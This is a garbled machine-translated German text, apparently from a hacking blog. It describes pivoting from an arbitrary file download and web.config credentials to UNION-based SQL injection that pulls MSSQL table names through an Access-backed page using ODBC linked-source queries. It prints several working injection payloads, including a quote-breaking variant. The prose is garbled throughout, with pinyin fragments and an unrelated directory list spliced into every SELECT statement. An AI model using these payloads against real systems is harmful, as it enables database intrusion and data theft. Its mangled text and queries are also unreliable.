Ersten Punkt angeht, hat diese Methode schon vor langer Zeit gewesen, aber wahrscheinlich in den Kopf mit einer ruhigen Zeit für zu lange, bereits in den vergessenen Zustand. Vielen Dank, Trace-Informationen. Oft Gesicht beliebigen Datei-Download Schwachstelle, die allgemeine Methode der Behandlung ist es, die Datenbank-Verbindung wieder-Datei zum Herunterladen, und dann die Remote-Verbindung.
Oft Gesicht beliebigen Datei-Download Schwachstelle, die allgemeine Methode der Behandlung ist es, die Datenbank-Verbindung wieder-Datei zum Herunterladen, dann gehen Sie die Remote-Verbindung. Ideal als staatliche MSSQL und MySQL, vor allem in der Datenbank und der WEB ist nicht der Fall der Trennung, Backup SHELL, Export SHELL, kann verwendet werden, werden viele Möglichkeiten.
Aber wenn die Datenbank-und Web Trennung, einschließlich des Netzes und die Datenbank nicht online ist, oder eine Firewall, so dass andere Shouduanshide Womenwufa Lian Shu Juku Uhr auf der Fernbedienung, Let's für einen weiteren schwer, oder sogar eine mssql Zhu Sie kann nicht Zhaodao Punkt, übernehmen in vielen Fällen meist hilflos.
Hier auf MSSQL als ein Beispiel, geschah es, eine beliebige Datei herunterzuladen Schwachstelle zu finden, direkt unter der Web.Config kommen zurück, um zu sehen, einschließlich der Network Discovery-Datenbank zu finden, einen halben Tag nicht finden der Einstichstelle, eine kleine Randbemerkungen, gibt es eine eine Station ist schade, ACCESS Datenbank. Guess den Tisch und zurück. Allerdings ist der Hintergrund Zielstation bekannt, so vorbereitet, um von der Access Point des Zielpunktes Injektion Administrator-Konto zu lesen. Einige intuitive, da direkt unter meinem lokalen Test-Ergebnisse:
Holen Sie sich einen einfachen Punkt, drei Felder ID, XM, XB, Typ-ID-Nummer, gefolgt von zwei Zeichen.
Angenommen, es gibt Schlupflöcher in dem Dokument, die Umsetzung der SQL-Anweisung Select Backup bin conf config Daten eshow_sitemap.html generate.sh log maint sitemap.html svn tmp aus dem Test whrere id = 1
Es gibt drei Felder, wir die Union gemeinsame Untersuchung verwenden zu entsprechen, was er ist (Black-Box mit der Bestellung von Feldern oder die Anzahl der Brute-Force-Bestimmung)
Wählen Sie "Backup bin conf config Daten eshow_sitemap.html generate.sh log maint sitemap.html svn tmp FROM test WHERE id = 999999 union select top 1 1,2, Namen von [ODBC, SQL Server Driver =; UID = dbo; PWD = dba ; =*****; Server Database = master]. ku
Hier werden die Master-Datenbank habe ich eine Tabelle mit dem Namen KU, über diese Abfrage, da id = 999999 nicht unter der Wirkung der gemeinsamen Untersuchung vorhanden, Web Access Datenbank-Inhalte auf dem Original-Display zeigt die Lage unserer Struktur UNION Abfrage-Ergebnisse, Name des Feldes in einer Zeichen-Display Position.
ku's Feld "Name" den Inhalt dieser Tabelle im Web auf die entsprechende Position wird angezeigt, aber dies ist eindeutig nicht das, was wir wollen, wir wollen die gesamte Tabelle Struktur und Inhalt
Um Meister als ein Beispiel, hier ist der Simulationsergebnisse, im Voraus weiß ich schon die Struktur des Meisters, bequem und die Ergebnisse werden die Prüfsumme verglichen werden, ist falsch.
Wählen Sie "Backup bin conf config Daten eshow_sitemap.html generate.sh log maint sitemap.html svn tmp FROM test WHERE id = 999999 union select top 1 1,2, table_name aus [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; =*****; Server Database = master]. INFORMATION_SCHEMA.TABLES
Dieser Master-Datenbank-Tabelle Namen zum ersten Mal aus.
Holen Sie sich hinter den Namen der Tabelle ist einfach.
Wählen Sie "Backup bin conf config Daten eshow_sitemap.html generate.sh log maint sitemap.html svn tmp FROM test WHERE id = 999999 union select top 1 1,2, table_name aus [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; =*****; Server Database = master]. INFORMATION_SCHEMA.TABLES wo table_name nicht in (select top 1 table_name aus [ODBC; Driver = SQL Server; UID = dbo; PWD = DBA; Server =****; Database = master]. INFORMATION_SCHEMA.TABLES)
Minderwertigen Rasse-Klasse zu schieben konventionellen Methode, um die Feldnamen und Inhalt des Codes unter ihren eigenen umständlich zu erreichen.
Wenn die Datenbank, wo die ID ist ein Charakter, dann
Wählen Sie "Backup bin conf config Daten eshow_sitemap.html generate.sh log maint sitemap.html svn tmp FROM test WHERE id = '999999 'union select top 1 1,2, table_name aus [ODBC; Driver = SQL Server; UID = dbo; PWD = DBA; =***; Server Database = master]. INFORMATION_SCHEMA.TABLES wo '1 '= '1'